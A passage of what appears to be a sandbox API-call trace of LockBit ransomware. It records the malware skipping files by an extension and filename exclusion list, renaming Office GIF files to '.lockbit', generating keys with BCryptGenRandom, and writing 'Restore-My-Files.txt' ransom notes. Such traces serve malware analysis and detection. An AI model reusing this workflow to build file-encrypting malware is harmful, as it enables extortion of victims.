lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.057] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.057] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.058] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10302_.GIF") returned 1 [0203.058] lstrcmpiW (lpString1="ntldr", lpString2="BD10302_.GIF") returned 1 [0203.058] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10302_.GIF") returned 1 [0203.058] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10302_.GIF") returned 1 [0203.058] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10302_.GIF") returned -1 [0203.058] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10302_.GIF") returned 1 [0203.058] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10302_.GIF") returned 1 [0203.058] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.058] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10302_.GIF") returned=".GIF" [0203.058] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.058] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.058] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.058] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.058] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.058] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.059] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.059] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.059] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.059] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.059] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.059] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.059] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.059] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.059] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.059] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.059] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.059] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.059] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.059] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.059] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.059] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.059] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.059] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.059] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.059] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.059] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.059] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10302_.GIF.lockbit") returned 78 [0203.059] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10302_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10302_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.061] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.061] malloc (_Size=0x40068) returned 0x3df0008 [0203.061] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=253) returned 1 [0203.061] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.061] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.061] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.062] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.062] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.067] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10302_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10302_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.067] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.067] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.067] free (_Block=0x1fa2ed8) [0203.067] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10302_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.067] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.067] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.067] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x604e8e00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbc8b9d80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x604e8e00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10335_.GIF", cAlternateFileName="")) returned 1 [0203.067] lstrcmpiW (lpString1=".", lpString2="BD10335_.GIF") returned -1 [0203.067] lstrcmpiW (lpString1="..", lpString2="BD10335_.GIF") returned -1 [0203.067] PathFindExtensionW (pszPath="BD10335_.GIF") returned=".GIF" [0203.067] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.067] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.067] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.067] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.067] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.067] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.067] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.067] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.067] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.068] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.068] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.068] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.068] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.068] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.068] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.068] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.068] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.068] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.069] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.069] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.069] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.069] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.069] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.069] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.069] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.069] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.069] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.069] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.069] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10335_.GIF") returned 1 [0203.069] lstrcmpiW (lpString1="ntldr", lpString2="BD10335_.GIF") returned 1 [0203.069] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10335_.GIF") returned 1 [0203.069] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10335_.GIF") returned 1 [0203.069] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10335_.GIF") returned -1 [0203.069] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10335_.GIF") returned 1 [0203.069] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10335_.GIF") returned 1 [0203.069] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.069] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10335_.GIF") returned=".GIF" [0203.069] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.069] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.069] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.069] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.069] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.069] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.069] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.069] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.070] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.070] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.070] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.070] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.070] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.070] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.070] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.070] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.070] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.070] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.070] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.070] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.070] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.070] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.070] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.070] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.070] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.070] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.070] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.070] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.070] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10335_.GIF.lockbit") returned 78 [0203.070] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10335_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10335_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.091] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.091] malloc (_Size=0x40068) returned 0x3df0008 [0203.091] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=282) returned 1 [0203.091] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.092] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.092] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.092] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.093] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.093] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.097] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10335_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10335_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.097] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.097] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.097] free (_Block=0x1fa2ed8) [0203.097] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10335_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.097] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.097] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.098] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x604e8e00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbc8b9d80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x604e8e00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10336_.GIF", cAlternateFileName="")) returned 1 [0203.098] lstrcmpiW (lpString1=".", lpString2="BD10336_.GIF") returned -1 [0203.098] lstrcmpiW (lpString1="..", lpString2="BD10336_.GIF") returned -1 [0203.098] PathFindExtensionW (pszPath="BD10336_.GIF") returned=".GIF" [0203.098] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.098] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.098] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.098] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.098] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.098] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.098] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.098] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.098] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.098] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.098] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.098] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.098] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.098] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.098] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.098] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.098] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.098] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.098] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.099] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.099] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.099] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.099] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.099] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.099] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.100] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.100] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.100] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10336_.GIF") returned 1 [0203.100] lstrcmpiW (lpString1="ntldr", lpString2="BD10336_.GIF") returned 1 [0203.100] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10336_.GIF") returned 1 [0203.100] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10336_.GIF") returned 1 [0203.100] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10336_.GIF") returned -1 [0203.100] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10336_.GIF") returned 1 [0203.100] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10336_.GIF") returned 1 [0203.100] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.100] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10336_.GIF") returned=".GIF" [0203.100] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.100] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.100] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.100] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.100] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.100] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.100] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.100] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.100] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.100] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.100] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.100] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.100] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.100] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.101] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.101] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.101] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.101] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.101] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.101] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.101] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.101] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.101] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.101] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.101] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.101] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.101] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.101] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.101] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10336_.GIF.lockbit") returned 78 [0203.101] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10336_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10336_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.103] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.103] malloc (_Size=0x40068) returned 0x3df0008 [0203.104] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=204) returned 1 [0203.104] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.104] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.104] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.105] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.105] ReadFile 